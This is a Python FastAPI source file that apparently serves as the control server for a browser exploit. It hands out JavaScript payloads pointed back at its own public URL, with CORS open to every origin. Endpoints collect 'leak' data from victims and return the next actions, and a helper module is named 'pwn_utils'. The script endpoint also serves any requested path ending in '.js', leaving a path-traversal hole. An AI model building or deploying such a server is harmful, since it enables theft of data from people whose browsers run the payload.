from fastapi.middleware.cors import CORSMiddleware
from fastapi import FastAPI, APIRouter, Response
from fastapi.responses import HTMLResponse
from typing import List
import platform
import os.path
import json


from ..service.interaction import receive_leak, get_next_actions
from .models import ReadUnitIn, SetDelayIn, WriteUnitIn
from ..model.error import Error
from ..service.pwn_utils import get_public_url

app = FastAPI()

app.add_middleware(
    CORSMiddleware,
    allow_origins=['*'],
    allow_credentials=True,
    allow_methods=['*'],
    allow_headers=['*'],
)

@app.get('/')
async def ping():
    return 'OK'


PUBLIC_URL = get_public_url()

cur_filename = __file__
dir_of = [os.path.sep, *cur_filename.split(os.path.sep)[:-3]]
if platform.system() == "Windows":
    dir_of = [dir_of[0], dir_of[1], os.path.sep, *dir_of[2:]]

@app.get('/index.html')
async def index():
    global PUBLIC_URL
    html_content = open(os.path.join(*dir_of, 'index.html'), 'r').read().replace('MAIN_URL', PUBLIC_URL)
    return HTMLResponse(content=html_content, status_code=200)


script_router = APIRouter(prefix="/scripts", tags=["scripts"])

@script_router.get('')
async def get_script(sc: str = 'index.js'):
    global PUBLIC_URL
    fname = sc if sc[-3:] == '.js' else 'index.js'
    return Response(content=open(os.path.join(*dir_of, fname), 'rb').read().replace(b'MAIN_URL', PUBLIC_URL.encode()),
                    media_type="application/javascript")


actions_router = APIRouter(prefix="/do", tags=["do"])



@actions_router.post('/read')
async def data_read(data: List[ReadUnitIn] | ReadUnitIn):
    return receive_leak(data)

@actions_router.post('/write')
async def data_write(data: List[WriteUnitIn] | WriteUnitIn):
    print(f"[.] Received write: {data}")
    return {}

@actions_router.post('/delay')
async def data_delay(data: List[SetDelayIn] | SetDelayIn):
    print(f"[.] Received delay: {data}")
    return {}


interactions_router = APIRouter(prefix="/comm", tags=["do"])

@interactions_router.post('/ask')
async def ask():
    return get_next_actions()

@interactions_router.post('/error')
async def error(data):
    Error.create(error=json.dumps(data))
    return {}


app.include_router(script_router)
app.include_router(actions_router)
app.include_router(interactions_router)
